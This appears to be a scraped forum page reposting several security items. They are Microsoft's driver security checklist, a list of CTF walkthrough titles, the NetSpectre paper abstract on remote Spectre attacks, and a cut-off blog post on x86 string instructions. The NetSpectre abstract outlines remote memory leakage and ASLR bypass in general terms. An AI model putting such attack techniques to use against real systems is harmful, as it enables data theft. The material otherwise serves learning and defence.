passed-in. Driver code must make correct use of memory All driver pool allocations must be in non-executable (NX) pool. Using NX memory pools is inherently more secure than using executable non-paged (NP) pools, and provides better protection against overflow attacks. For more information about the related device fundamentals test, see Device.DevFund.Memory.NXPool. Device drivers must properly handle various user-mode, as well as kernel to kernel I/O, requests. For more information about the related device fundamentals test, see Device.DevFund.Reliability.BasicSecurity. To allow drivers to support HVCI virtualization, there are additional memory requirements. For more information, see Device Guard Compatibility later in this article. Handles Validate handles passed between user-mode and kernel-mode memory. For more information, see Handle Management and Failure to Validate Object Handles. Device objects Secure device objects. For more information, see Securing Device Objects. Validate device objects. For more information, see Failure to Validate Device Objects. IRPs WDF and IRPs One advantage of using WDF, is that WDF drivers typically do not directly access IRPs. For example, the framework converts the WDM IRPs that represent read, write, and device I/O control operations to framework request objects that KMDF/UMDF receive in I/O queues. If you are writing a WDM driver, review the following guidance. Properly manage IRP I/O buffers The following articles provide information about validating IRP input values: DispatchReadWrite Using Buffered I/O Errors in Buffered I/O DispatchReadWrite Using Direct I/O Errors in Direct I/O Security Issues for I/O Control Codes Consider validating values that are associated with an IRP, such as buffer addresses and lengths. If you chose to use Neither I/O, be aware that unlike Read and Write, and unlike Buffered I/O and Direct I/O, that when using Neither I/O IOCTL the buffer pointers and lengths are not validated by the I/O Manager. Handle IRP completion operations properly A driver must never complete an IRP with a status value of STATUS_SUCCESS unless it actually supports and processes the IRP. For information about the correct ways to handle IRP completion operations, see Completing IRPs. Manage driver IRP pending state The driver should mark the IRP pending before it saves the IRP, and should consider including both the call to IoMarkIrpPending and the assignment in an interlocked sequence. For more information, see Failure to Check a Driver's State and Holding Incoming IRPs When A Device Is Paused. Handle IRP cancellation operations properly Cancel operations can be difficult to code properly because they typically execute asynchronously. Problems in the code that handles cancel operations can go unnoticed for a long time, because this code is typically not executed frequently in a running system. Be sure to read and understand all of the information supplied under Canceling IRPs. Pay special attention to Synchronizing IRP Cancellation and Points to Consider When Canceling IRPs. One recommended way to minimize the synchronization problems that are associated with cancel operations is to implement a cancel-safe IRP queue. Handle IRP cleanup and close operations properly Be sure that you understand the difference between IRP_MJ_CLEANUP and IRP_MJ_CLOSE requests. Cleanup requests arrive after an application closes all handles on a file object, but sometimes before all I/O requests have completed. Close requests arrive after all I/O requests for the file object have been completed or canceled. For more information, see the following articles: DispatchCreate, DispatchClose, and DispatchCreateClose Routines DispatchCleanup Routines Errors in Handling Cleanup and Close Operations For more information about handling IRPs correctly, see Additional Errors in Handling IRPs. Other security issues Use a lock or an interlocked sequence to prevent race conditions. For more information, see Errors in a Multiprocessor Environment. Ensure that device drivers properly handle various user-mode as well as kernel to kernel I/O requests. For more information, see Device.DevFund.Reliability.BasicSecurity. Ensure that no TDI filters or LSPs are installed by the driver or associated software packages during installation or usage. For more information about the related driver fundamentals test, see Device.DevFund.Security. Use safe functions Use safe string functions. For more information, see Using Safe String Functions. Use safe arithmetic functions. For more information, see Arithmetic Functions in Safe Integer Library Routines Use safe conversion functions. For more information, see Conversion Functions in Safe Integer Library Routines Additional code vulnerabilities In addition to the possible vulnerabilities covered here, this article provides additional information about enhancing the security of kernel mode driver code: Creating Reliable Kernel-Mode Drivers. For additional information about C and C++ secure coding, see Secure coding resources at the end of this article. Manage driver access control Security checklist item #7: Review your driver to make sure that you are properly controlling access. Managing driver access control - WDF Drivers must work to prevent users from inappropriately accessing a computer's devices and files. To prevent unauthorized access to devices and files, you must: Name device objects only when necessary. Named device objects are generally only necessary for legacy reasons, for example if you have an application that expects to open the device using a particular name or if you’re using a non-PNP device/control device. Note that WDF drivers do not need to name their PnP device FDO in order to create a symbolic link using WdfDeviceCreateSymbolicLink. Secure access to device objects and interfaces. In order to allow applications or other WDF drivers to access your PnP device PDO, you should use device interfaces. For more information, see Using Device Interfaces. A device interface serves as a symbolic link to your device stack’s PDO. One of the betters way to control access to the PDO is by specifying an SDDL string in your INF. If the SDDL string is not in the INF file, Windows will apply a default security descriptor. For more information, see Securing Device Objects and SDDL for Device Objects. For more information about controlling access, see the following articles: Controlling Device Access in KMDF Drivers Names, Security Descriptors and Device Classes - Making Device Objects Accessible… and SAFE from the January February 2017 The NT Insider Newsletter published by OSR. Managing driver access control - WDM If you are working with a WDM Driver and you used a named device object you can use IoCreateDeviceSecure and specify a SDDL to secure it. When you implement IoCreateDeviceSecure always specify a custom class GUID for DeviceClassGuid. You should not specify an existing class GUID here. Doing so has the potential to break security settings or compatibility for other devices belonging to that class. For more information, see WdmlibIoCreateDeviceSecure. For more information, see the following articles: Controlling Device Access Controlling Device Namespace Access Windows security model for driver developers Security Identifiers (SIDs) risk hierarchy The following section describes the risk hierarchy of the common SIDs used in driver code. For general information about SDDL, see SDDL for Device Objects, SID Strings, and SDDL String Syntax. It is important to understand that if lower privilege callers are allowed to access the kernel, code risk is increased. In this summary diagram, the risk increases as you allow lower privilege SIDs access to your driver functionality. SY (System) \/ BA (Built-in Administrators) \/ LS (Local Service) \/ BU (Built-in User) \/ AC (Application Container) Following the general least privilege security principle, configure only the minimum level of access that is required for your driver to function. WDM Granular IOCTL security control To further manage security when IOCTLs are sent by user-mode callers, the driver code can include the IoValidateDeviceIoControlAccess function. This function allows a driver to check access rights. Upon receiving an IOCTL, a driver can call IoValidateDeviceIoControlAccess, specifying FILE_READ_ACCESS, FILE_WRITE_ACCESS, or both. Implementing granular IOCTL security control does not replace the need to manage driver access using the techniques discussed above. For more information, see the following articles: Defining I/O Control Codes Validate Device Guard compatibility Security checklist item #8: Validate that your driver uses memory so that it is Device Guard compatible. Memory usage and Device Guard compatibility Device Guard uses hardware technology and virtualization to isolate the Code Integrity (CI) decision-making function from the rest of the operating system. When using virtualization-based security to isolate CI, the only way kernel memory can become executable is through a CI verification. This means that kernel memory pages can never be Writable and Executable (W+X) and executable code cannot be directly modified. To implement Device Guard compatible code, make sure your driver code does the following: Opts in to NX by default Uses NX APIs/flags for memory allocation (NonPagedPoolNx) Does not use sections that are both writable and executable Does not attempt to directly modify executable system memory Does not use dynamic code in kernel Does not load data files as executable Section alignment is a multiple of 0x1000 (PAGE_SIZE). E.g. DRIVER_ALIGNMENT=0x1000 For more information about using the tool and a list of incompatible memory calls, see Use the Device Guard Readiness Tool to evaluate HVCI driver compatibility. For general information about Device Guard, see Windows 10 Device Guard and Credential Guard Demystified and Device Guard deployment guide. For more information about the related device fundamentals test, see Device.DevFund.DeviceGuard. Follow technology-specific code best practices Security checklist item #9: Review the following technology-specific guidance for your driver. File Systems For more information, about file system driver security see the following articles: Security Considerations for File Systems File System Security Issues Security Features for File Systems Security Considerations for File System Filter Drivers NDIS - Networking For information about NDIS driver security, see Security Issues for Network Drivers. Display For information about display driver security, see <Content Pending>. Printers For information related to printer driver security, see V4 Printer Driver Security Considerations. Security Issues for Windows Image Acquisition (WIA) Drivers For information about WIA security, see Security Issues for Windows Image Acquisition (WIA) Drivers. Enhance device installation security Security checklist item #10: Review driver inf creation and installation guidance to make sure you are following best practices. When you create the code that installs your driver, you must make sure that the installation of your device will always be performed in a secure manner. A secure device installation is one that does the following: Limits access to the device and its device interface classes Limits access to the driver services that were created for the device Protects driver files from modification or deletion Limits access to the device's registry entries Limits access to the device's WMI classes Uses SetupAPI functions correctly For more information, see the following articles: Creating Secure Device Installations Guidelines for Using SetupAPI Using Device Installation Functions Device and Driver Installation Advanced Topics Perform peer code review Security checklist item #11: Perform peer code review, to look for issues not surfaced by the other tools and processes Seek out knowledgeable code reviewers to look for issues that you may have missed. A second set of eyes will often see issues that you may have overlooked. If you don't have suitable staff to review you code internally, consider engaging outside help for this purpose. Execute proper release driver signing Security checklist item #12: Use the Windows partner portal to properly sign your driver for distribution. Before you release a driver package to the public, we recommend that you submit the package for certification. For more information, see Test for performance and compatibility, Get started with the Hardware program, Hardware Dashboard Services, and Attestation signing a kernel driver for public release. Use code analysis in Visual Studio to investigate driver security Security checklist item #13: Follow these steps to use the code analysis feature in Visual Studio to check for vulnerabilities in your driver code. Use the code analysis feature in Visual Studio to check for security vulnerabilities in your code. The Windows Driver Kit (WDK) installs rule sets that are designed to check for issues in native driver code. For more information, see How to run Code Analysis for drivers. For more information, see Code Analysis for drivers overview. For additional background on code analysis, see Visual Studio 2013 Static Code Analysis in depth. To become familiar with code analysis, you can use one of the sample drivers for example, the featured toaster sample, https://github.com/Microsoft/Windows-driver-samples/tree/master/general/toaster/toastDrv/kmdf/func/featured or the ELAM Early Launch Anti-Malware sample https://github.com/Microsoft/Windows-driver-samples/tree/master/security/elam. Open the driver solution in Visual Studio. In Visual Studio, for each project in the solution change the project properties to use the desired rule set. For example: Project >> Properties >> Code Analysis >> General, select Recommended driver rules. In addition to using the recommenced driver rules, use the Recommended native rules rule set. Select Build >> Run Code Analysis on Solution. View warnings in the Error List tab of the build output window in Visual Studio. Click on the description for each warning to see the problematic area in your code. Click on the linked warning code to see additional information. Determine whether your code needs to be changed, or whether an annotation needs to be added to allow the code analysis engine to properly follow the intent of your code. For more information on code annotation, see Using SAL Annotations to Reduce C/C++ Code Defects and SAL 2.0 Annotations for Windows Drivers. For general information on SAL, refer to this article available from OSR. https://www.osr.com/blog/2015/02/23/sal-annotations-dont-hate-im-beautiful/ Use Static Driver Verifier to check for vulnerabilities Security checklist item #14: Follow these steps to use Static Driver Verifier (SDV) in Visual Studio to check for vulnerabilities in your driver code. Static Driver Verifier (SDV) uses a set of interface rules and a model of the operating system to determine whether the driver interacts correctly with the Windows operating system. SDV finds defects in driver code that could point to potential bugs in drivers. For more information, see Introducing Static Driver Verifier and Static Driver Verifier. Note that only certain types of drivers are supported by SDV. For more information about the drivers that SDV can verify, see Supported Drivers. To become familiar with SDV, you can use one of the sample drivers (for example, the featured toaster sample: https://github.com/Microsoft/Windows-driver-samples/tree/master/general/toaster/toastDrv/kmdf/func/featured). Open the targeted driver solution in Visual Studio. In Visual Studio, change the build type to Release. Static Driver Verifier requires that the build type is release, not debug. In Visual Studio, select Build >> Build Solution. In Visual Studio, select Driver >> Launch Static Driver Verifier. In SDV, on the Rules tab, select Default under Rule Sets. Although the default rules find many common issues, consider running the more extensive All driver rules rule set as well. On the Main tab of SDV, click Start. When SDV is complete, review any warnings in the output. The Main tab displays the total number of defects found. Click on each warning to load the SDV Report Page and examine the information associated with the possible code vulnerability. Use the report to investigate the verification result and to identify paths in your driver that fail a SDV verification. For more information, see Static Driver Verifier Report. Check code with BinScope Binary Analyzer Security checklist item #15: Follow these steps to use BinScope to double check that compile and build options are configured to minimize known security issues. Use BinScope to examine application binary files to identify coding and building practices that can potentially render the application vulnerable to attack or to being used as an attack vector. For more information, see New Version of BinScope Binary Analyzer and the user and getting started guides that are included with the tool download as well as this BinScope Binary Analyzer TechNet Video. Follow these steps to validate that the security compile options are properly configured in the code that you are shipping: Download BinScope Analyzer and related documents from here: https://www.microsoft.com/download/details.aspx?id=44995. Review the BinScope Getting Started Guide that you downloaded. Use the MSI file to install BinScope on the target test machine that contains the compiled code you wish to validate. Open a command prompt window and execute the following command to examine a compiled driver binary. Update the path to point to your complied driver .sys file. C:\Program Files\Microsoft BinScope 2014>binscope "C:\Samples\KMDF_Echo_Driver\echo.sys" /verbose /html /logfile c:\mylog.htm Use a browser to review the BinScope report to confirm that all checks are marked (PASS). By default, the HTML report is written to \users\<username>\BinScope\ There are three categories that may be output into a log file: Failed checks [Fail] Checks that didn’t complete [Error] Passed checks [Pass] Note that passed checks are not written to the log by default and must be enabled by using the /verbose switch. Results for Microsoft BinScope 2014 run on MyPC at 2017-01-28T00:18:48.3828242Z Failed Checks No failed checks. Passed Checks • C:\Samples\KMDF_Echo_Driver\echo.sys - ATLVersionCheck (PASS) • C:\Samples\KMDF_Echo_Driver\echo.sys - ATLVulnCheck (PASS) • C:\Samples\KMDF_Echo_Driver\echo.sys - CompilerVersionCheck (PASS) • C:\Samples\KMDF_Echo_Driver\echo.sys - DBCheck (PASS) • C:\Samples\KMDF_Echo_Driver\echo.sys - DefaultGSCookieCheck (PASS) • C:\Samples\KMDF_Echo_Driver\echo.sys - ExecutableImportsCheck (PASS) • C:\Samples\KMDF_Echo_Driver\echo.sys - GSCheck (PASS) • C:\Samples\KMDF_Echo_Driver\echo.sys - GSFriendlyInitCheck (PASS) • C:\Samples\KMDF_Echo_Driver\echo.sys - GSFunctionSafeBuffersCheck (PASS) • C:\Samples\KMDF_Echo_Driver\echo.sys - HighEntropyVACheck (PASS) • C:\Samples\KMDF_Echo_Driver\echo.sys - NXCheck (PASS) • C:\Samples\KMDF_Echo_Driver\echo.sys - RSA32Check (PASS) • C:\Samples\KMDF_Echo_Driver\echo.sys - SafeSEHCheck (PASS) • C:\Samples\KMDF_Echo_Driver\echo.sys - SharedSectionCheck (PASS) • C:\Samples\KMDF_Echo_Driver\echo.sys - VB6Check (PASS) • C:\Samples\KMDF_Echo_Driver\echo.sys - WXCheck (PASS) Checks Executed: • ATLVersionCheck • ATLVulnCheck • CompilerVersionCheck • DBCheck • DefaultGSCookieCheck • ExecutableImportsCheck • GSCheck • GSFriendlyInitCheck • GSFunctionSafeBuffersCheck • HighEntropyVACheck • NXCheck • RSA32Check • SafeSEHCheck • SharedSectionCheck • VB6Check • WXCheck All Scanned Items • C:\Samples\KMDF_Echo_Driver\echo.sys Use additional code validation tools Security checklist item #16: Use these additional tools to help validate that your code follows security recommendations and to probe for gaps that were missed in your development process. In addition to Visual Studio Code analysis, Static Driver Verifier, and Binscope discussed above, use the following tools to probe for gaps that were missed in your development process. Driver Verifier Driver Verifier allows for live testing of the driver. Driver Verifier monitors Windows kernel-mode drivers and graphics drivers to detect illegal function calls or actions that might corrupt the system. Driver Verifier can subject the Windows drivers to a variety of stresses and tests to find improper behavior. For more information, see Driver Verifier. Hardware compatibility program tests The hardware compatibility program includes security related tests can be used to look for code vulnerabilities. The Windows Hardware Compatibility Program leverages the tests in the Windows Hardware Lab Kit (HLK). The HLK Device Fundamentals tests can be used on the command line to exercise driver code and probe for weakness. For general information about the device fundamentals tests and the hardware compatibility program, see Hardware Compatibility Specifications for Windows 10, version 1607. The following tests are examples of tests that may be useful to check driver code for some behaviors associated with code vulnerabilities: Device driver must properly handle various user-mode, as well as kernel to kernel I/O, requests. For more information, see Device.DevFund.Reliability.BasicSecurity The Device Fundamentals Penetration tests perform various forms of input attacks, which are a critical component of security testing. Attack and Penetration testing can help identify vulnerabilities in software interfaces. Some basic fuzz testing, as well as the IoSpy and IoAttack utilities, are included. For more information, see Penetration Tests (Device Fundamentals) and How to Perform Fuzz Tests with IoSpy and IoAttack. The CHAOS (Concurrent Hardware and Operating System) tests run various PnP driver tests, device driver fuzz tests, and power system tests concurrently. For more information, see CHAOS Tests (Device Fundamentals). Device Path Exerciser runs as part of Device.DevFund.Reliability.BasicSecurity. For more information see Device.DevFund.Reliability. All driver pool allocations must be in NX pool. Using non-executable memory pools is inherently more secure than executable non-paged (NP) pools, and provides better protection against overflow attacks. For more information, see DevFund.Memory.NXPool. Use the Device.DevFund.DeviceGuard test, along with the other tools described in this article, to confirm that your driver is Device Guard compatible. Custom and domain-specific test tools Consider the development of custom domain-specific security tests. To develop additional tests, gather input from the original designers of the software, as well as unrelated development resources familiar with the specific type of driver being developed, and one or more people familiar with security intrusion analysis and prevention. Review debugger techniques and extensions Security checklist item #17: Review these debugger tools and consider their use in your development debugging workflow. !exploitable Crash Analyzer The !exploitable Crash Analyzer is a Windows debugger extensions that parses crash logs looking for unique issues. It also examines the type of crash and tries to determine whether the error is something that could be exploited by a malicious hacker. Microsoft Security Engineering Center (MSEC), created the !exploitable Crash Analyzer. You can download the from codeplex: http://msecdbg.codeplex.com/. For more information, see !Exploitable crash analyzer version 1.6 and the Channel 9 video !exploitable Crash Analyzer. Security related debugger commands The !acl extension formats and displays the contents of an access control list (ACL). For more information, see Determining the ACL of an Object and !acl. The !token extension displays a formatted view of a security token object. For more information, see !token. The !tokenfields extension displays the names and offsets of the fields within the access token object (the TOKEN structure). For more information, see !tokenfields. The !sid extension displays the security identifier (SID) at the specified address. For more information, see !sid. The !sd extension displays the security descriptor at the specified address. For more information, see !sd. Review secure coding resources Security checklist item #18: Review these resources to expand your understanding of the secure coding best practices that are applicable to driver developers. Review these resources to learn more about driver security Secure kernel-mode driver coding guidelines Creating Reliable Kernel-Mode Drivers Secure coding organizations Carnegie Mellon University SEI CERT Carnegie Mellon University SEI CERT C Coding Standard: Rules for Developing Safe, Reliable, and Secure Systems (2016 Edition) available as a PDF download. CERT - Build Security In MITRE - Weaknesses Addressed by the CERT C Secure Coding Standard Building Security In Maturity Model (BSIMM) - https://www.bsimm.com/ SAFECode - https://www.safecode.org/ OSR OSR provides driver development training and consulting services. These articles from the OSR newsletter highlight driver security issues. Names, Security Descriptors and Device Classes - Making Device Objects Accessible… and SAFE You've Gotta Use Protection -- Inside Driver & Device Security Locking Down Drivers - A Survey of Techniques Meltdown and Spectre: What about drivers? Books 24 deadly sins of software security : programming flaws and how to fix them by Michael Howard, David LeBlanc and John Viega The art of software security assessment : identifying and preventing software vulnerabilities, Mark Dowd, John McDonald and Justin Schuh Writing Secure Software Second Edition, Michael Howard and David LeBlanc The Art of Software Security Assessment: Identifying and Preventing Software Vulnerabilities, Mark Dowd and John McDonald Secure Coding in C and C++ (SEI Series in Software Engineering) 2nd Edition, Robert C. Seacord Programming the Microsoft Windows Driver Model (2nd Edition), Walter Oney Developing Drivers with the Windows Driver Foundation (Developer Reference), Penny Orwick and Guy Smith Training Windows driver classroom training is available from vendors such as the following: OSR Winsider Azius Secure coding online training is available from a variety of sources. For example, this course is available from coursera: https://www.coursera.org/learn/software-security. SAFECode offers free training as well: SAFECode/training Professional Certification CERT offers a Secure Coding Professional Certification. Summary of key takeaways Driver security is a complex undertaking containing many elements, but here are a few key points to consider: Drivers live in the windows kernel, and having an issue when executing in kernel exposes the entire operating system. Because of this, pay close attention to driver security and design with security in mind. Apply the principle of least privilege: a. Use a strict SDDL string to restrict access to the driver b. Further restrict individual IOCTL’s Create a threat model to identify attack vectors and consider whether anything can be restricted further. Be careful with regard to embedded pointers being passed in from usermode. They need to be probed, accessed within try except, and they are prone to time of check time of use (ToCToU) issues unless the value of the buffer is captured and compared. If you're unsure, use METHOD_BUFFERED as an IOCTL buffering method. Use code scanning utilities to look for known code vulnerabilities and remediate any identified issues. Seek out knowledgeable code reviewers to look for issues that you may have missed. Use driver verifiers and test your driver with multiple inputs, including corner cases. Send comments about this article to Microsoft Sursa: https://docs.microsoft.com/en-us/windows-hardware/drivers/driversecurity/driver-security-checklist
-
Capture the Flag Challenges posted in CTF Challenges on November 12, 2016 by Raj Chandel Hack the Jarbas: 1 (CTF Challenge) OverTheWire – Bandit Walkthrough (14-21) Hack the Temple of Doom (CTF Challenge) Hack the Golden Eye:1 (CTF Challenge) Hack the FourAndSix (CTF Challenge) Hack the Blacklight: 1 (CTF Challenge) Hack the Basic Pentesting:2 VM (CTF Challenge) Hack the Billu Box2 VM (Boot to Root) Hack the Lin.Security VM (Boot to Root) Hack The Toppo:1 VM (CTF Challenge) Hack the Box Challenge: Ariekei Walkthrough Hack the Violator (CTF Challenge) OverTheWire – Bandit Walkthrough (1-14) Hack the Teuchter VM (CTF Challenge) Hack the Box Challenge: Enterprises Walkthrough Hack the Box Challenge: Falafel Walkthrough Hack the Box Challenge: Charon Walkthrough Hack the PinkyPalace VM (CTF Challenge) Hack the Box Challenge: Jail Walkthrough Hack the Box Challenge: Nibble Walkthrough Hack The Blackmarket VM (CTF Challenge) Hack the Box: October Walkthrough Hack The Box : Nineveh Walkthrough Hack The Gemini Inc (CTF Challenge) Hack The Vulnhub Pentester Lab: S2-052 Hack the Box Challenge: Sneaky Walkthrough Hack the Box Challenge: Chatterbox Walkthrough Hack the Box Challenge: Crimestoppers Walkthrough Hack the Box Challenge: Jeeves Walkthrough Hack the Trollcave VM (Boot to Root) Hack the Box Challenge: Fluxcapacitor Walkthrough Hack the Box Challenge: Tally Walkthrough Hack the Box Challenge: Inception Walkthrough Hack the Box Challenge Bashed Walkthrough Hack the Box Challenge Kotarak Walkthrough Hack the Box Challenge Lazy Walkthrough Hack the Box Challenge: Optimum Walkthrough Hack the Box Challenge: Brainfuck Walkthrough Hack the Box Challenge: Europa Walkthrough Hack the Box Challenge: Calamity Walkthrough Hack the Box Challenge: Shrek Walkthrough Hack the Box Challenge: Bank Walkthrough Hack the BSides Vancouver:2018 VM (Boot2Root Challenge) Hack the Box Challenge: Mantis Walkthrough Hack the Box Challenge: Shocker Walkthrough Hack the Box Challenge: Devel Walkthrough Hack the Box Challenge: Granny Walkthrough Hack the Box Challenge: Node Walkthrough Hack the Box Challenge: Haircut Walkthrough Hack the Box Challenge: Arctic Walkthrough Hack the Box Challenge: Tenten Walkthrough Hack the Box Challenge: Joker Walkthrough Hack the Box Challenge: Popcorn Walkthrough Hack the Box Challenge: Cronos Walkthrough Hack the Box Challenge: Beep Walkthrough Hack the Bob: 1.0.1 VM (CTF Challenge) Hack the Box Challenge: Legacy Walkthrough Hack the Box Challenge: Sense Walkthrough Hack the Box Challenge: Solid State Walkthrough Hack the Box Challenge: Apocalyst Walkthrough Hack the Box Challenge: Mirai Walkthrough Hack the Box Challenge: Grandpa Walkthrough Hack the Box Challenge: Blue Walkthrough Hack the Box Challenge: Lame Walkthrough Hack the Box Challenge: Blocky Walkthrough Hack the W1R3S.inc VM (CTF Challenge) Hack the Vulnupload VM (CTF Challenge) Hack the DerpNStink VM (CTF Challenge) Hack the Game of Thrones VM (CTF Challenge) Hack the C0m80 VM (Boot2root Challenge) Hack the Bsides London VM 2017(Boot2Root) Hack the USV: 2017 (CTF Challenge) Hack the Cyberry: 1 VM( Boot2Root Challenge) Hack the Basic Penetration VM (Boot2Root Challenge) Hack The Ether: EvilScience VM (CTF Challenge) Hack the Depth VM (CTF Challenge) Hack the G0rmint VM (CTF Challenge) Hack the Covfefe VM (CTF Challenge) Hack the Born2Root VM (CTF Challenge) Hack the dina VM (CTF Challenge) Hack the H.A.S.T.E. VM Challenge Hack the RickdiculouslyEasy VM (CTF Challenge) Hack the BTRSys1 VM (Boot2Root Challenge) Hack the BTRSys: v2.1 VM (Boot2Root Challenge) Hack the Bulldog VM (Boot2Root Challenge) Hack the Lazysysadmin VM (CTF Challenge) Hack the Zico2 VM (CTF Challenge) Hack the Primer VM (CTF Challenge) Hack the thewall VM (CTF Challenge) Hack the IMF VM (CTF Challenge) Hack the 6days VM (CTF Challenge) Hack the 64base VM (CTF Challenge) Hack the EW Skuzzy VM (CTF Challenge) Hack the Analougepond VM (CTF Challenge) Hack the Moria: 1.1 (CTF Challenge) Hack the DonkeyDocker (CTF Challenge) Hack the d0not5top VM (CTF Challenge) Hack the Super Mario (CTF Challenge) Hack the Defense Space VM (CTF Challenge) Hack the billu: b0x VM (Boot2root Challenge) Hack the Orcus VM CTF Challenge Hack the Nightmare VM (CTF Challenge) Hack the Bot challenge: Dexter (Boot2Root Challenge) Hack the Fartknocker VM (CTF Challenge) Hack the Pluck VM (CTF Challenge) Hack the Sedna VM (CTF Challenge) Hack the Quaoar VM (CTF Challenge) Hack the Gibson VM (CTF Challenge) Hack the Pipe VM (CTF Challenge) Hack the USV VM (CTF Challenge) Hack the Pentester Lab: from SQL injection to Shell II (Blind SQL Injection) Hack the Pentester Lab: from SQL injection to Shell VM Hack the Padding Oracle Lab Hack the Fortress VM (CTF Challenge) Hack the Zorz VM (CTF Challenge) Hack the Freshly VM (CTF Challenge) Hack the Hackday Albania VM (CTF Challenge) Hack the Necromancer VM (CTF Challenge) Hack the Billy Madison VM (CTF Challenge) Hack the Seattle VM (CTF Challenge) Hack the SkyDog Con CTF 2016 – Catch Me If You Can VM Hack Acid Reloaded VM (CTF Challenge) Hack the Breach 2.1 VM (CTF Challenge) Hack the Lord of the Root VM (CTF Challenge) Hack the Acid VM (CTF Challenge) Hack the SpyderSec VM (CTF Challenge) Hack the VulOS 2.0 VM (CTF Challenge) Hack the SickOS 1.1 VM (CTF Challenge) Hack the Fristileaks VM (CTF Challenge) Hack the NullByte VM (CTF Challenge) Hack the Minotaur VM (CTF Challenge) Hack the TommyBoy VM (CTF Challenge) Hack the Breach 1.0 VM (CTF Challenge) Hack the SkyDog VM (CTF Challenge) Hack the Milnet VM (CTF Challenge) Hack the Kevgir VM (CTF Challenge) Hack the Simple VM (CTF Challenge) Hack the SickOS 1.2 VM (CTF Challenge) Hack the Sidney VM (CTF Challenge) Hack the Stapler VM (CTF Challenge) Hack the Droopy VM (CTF Challenge) Hack the Mr. Robot VM (CTF Challenge) Penetration Testing in PwnLab (CTF Challenge) Hack the Skytower (CTF Challenge) Hack the Kioptrix 5 (CTF Challenge) Hack The Kioptrix Level-1.3 (Boot2Root Challenge) Hack the Kioptrix Level-1.2 (Boot2Root Challenge) Hack The Kioptrix Level-1.1 (Boot2Root Challenge) Hack The Kioptrix Level-1 Hack the Troll-1 VM (Boot to Root) Hack the Hackademic-RTB1 VM (Boot to Root) Hack the De-ICE: S1.120 VM (Boot to Root) Hack the pWnOS: 2.0 (Boot 2 Root Challenge) Hack the pWnOS-1.0 (Boot To Root) Sursa: http://www.hackingarticles.in/capture-flag-challenges/
-
- 3
-
-
Michael Schwarz Graz University of Technology Martin Schwarzl Graz University of Technology Moritz Lipp Graz University of Technology Daniel Gruss Graz University of Technology ABSTRACT Speculative execution is a crucial cornerstone to the performance of modern processors. During speculative execution, the processor may perform operations the program usually would not perform. While the architectural effects and results of such operations are discarded if the speculative execution is aborted, microarchitectural side effects may remain. The recently published Spectre attacks exploit these side effects to read memory contents of other programs. However, Spectre attacks require some form of local code execution on the target system. Hence, systems where an attacker cannot run any code at all were, until now, thought to be safe. In this paper, we present NetSpectre, a generic remote Spectre variant 1 attack. For this purpose, we demonstrate the first access- driven remote Evict+Reload cache attack over network, leaking 15 bits per hour. Beyond retrofitting existing attacks to a network scenario, we also demonstrate the first Spectre attack which does not use a cache covert channel. Instead, we present a novel high- performance AVX-based covert channel that we use in our cache- free Spectre attack. We show that in particular remote Spectre attacks perform significantly better with the AVX-based covert channel, leaking 60 bits per hour from the target system. We verified that our NetSpectre attacks work in local-area networks as well as between virtual machines in the Google cloud. NetSpectre marks a paradigm shift from local attacks, to remote attacks, exposing a much wider range and larger number of devices to Spectre attacks. Spectre attacks now must also be considered on devices which do not run any potentially attacker-controlled code at all. We show that especially in this remote scenario, attacks based on weaker gadgets which do not leak actual data, are still very powerful to break address-space layout randomization remotely. Several of the Spectre gadgets we discuss are more versatile than anticipated. In particular, value-thresholding is a technique we devise, which leaks a secret value without the typical bit selection mechanisms. We outline challenges for future research on Spectre attacks and Spectre mitigations Download: https://misc0110.net/web/files/netspectre.pdf
-
Ophir Harpaz Cybercrime researcher at Trusteer, IBM Security. Beginner reverse engineer. Author of https://begin.re. Jul 23 A Summary of x86 String Instructions I have never managed to memorize all of x86 Assembly’s string instructions — so I wrote a cheat sheet for myself. Then I thought other people may find it useful too, and so this cheat sheet is now a blog post. This is what you’ll find here: The logic behind x86 string instructions. All the information from (1) squeezed into a table. A real-life example. Let’s go. Note: in order to understand this post, basic knowledge in x86 Assembly is required. I do not explain what registers are, how a string is represented in memory, etc. The Logic The Prefix + Instruction Combo First, let’s make the distinction between string instructions (MOVS, LODS, STOS, CMPS, SCAS) and repetition prefixes (REP, REPE, REPNE, REPZ, REPNZ). Repetition prefixes are meaningful only when preceding string instructions. They cause the specified instruction to repeat as long as certain conditions are met. These prefixes are also responsible for updating the relevant pointers after each iteration by the proper number of bytes. The possible combinations of prefixes and instructions are described in the following figure. Possible combinations of repetition prefixes (dark blue) and string instructions (light blue). Note: I exclude the INS, OUTS string instructions as I have rarely seen them. Termination Conditions REP: repeat until ECX equals 0. REPE, REPZ: repeat until ECX equals 0 or as long as the zero flag is set. The two prefixes mean exactly the same. REPNE, REPNZ: repeat until ECX equals 0 or as long as the zero flag is unset. The two prefixes mean exactly the same. String Instructions The instruction’s first three letters tell us what it does. The “S” in all instructions stands for — how surprising — “String”. Each of these instructions is followed by a letter representing the size to operate on: ‘B’ for byte, ‘W’ for word (2 bytes) and ‘D’ for double-word (4 bytes). Some string instructions operate on two strings: the string pointed to by ESI register (source string) and the string pointed to by EDI register (destination string): MOV moves data from the source string to the destination string. CMP compares data between the source and destination strings (in x86, comparison is basically subtraction which affects the EFLAGS register). Strings pointed to by the ESI, EDI registers. Other string instructions operate on only one string: LOD loads data from the string pointed to by ESI into EAX¹. STO stores data from EAX¹ into the string pointed to by EDI. SCA scans the data in the string pointed to by EDI and compares it to EAX¹ (again, along with affecting EFLAGS). Notes: 1. I use EAX to refer to AL for byte operations, AX for word operations and EAX for double-word operations. 2. After each iteration, ESI and EDI are incremented if the direction flag is set, and decremented otherwise. REPE CMPSB for Trump’s Rescue. Cheat Sheet Cheat sheet for x86 Assembly’s string instructions. A Real-Life Example Lately, we started doing CTFs at work (Trusteer, IBM Security). I stumbled upon a crack-me challenge from reversing.kr which contained the following function. Try to think about what this function is while we reverse engineer it together. The function receives three arguments and puts the third (arg_8) in ECX. If arg_8 equals zero, the function returns. Otherwise, we prepare the other registers for a string instruction: the first argument, arg_0, is moved into EDI and EAX is set to zero. Now, we have a REPNE SCASB: The string pointed to by EDI is scanned and each character is compared to zero, held by AL. This happens until ECX equals zero or until a null-terminator is scanned. Practically speaking, this instruction aims at finding the length of the destination string. If ECX ends up being zero (meaning a null terminator was not encountered), then ECX simply receives its original value back — arg_8. Otherwise, if the loop terminates due to a null character, ECX is set to the destination string’s length (including the null character). In other words, ECX is set to Min{ECX, len(destination_string)}. Now EDI is set to arg_0 and ESI is set to arg_4, and we have REPE CMPSB: Each character pointed to by EDI is compared to the corresponding one pointed to by ESI. This happens until ECX equals zero (namely, the destination string has been fully consumed) or until the zero flag is unset 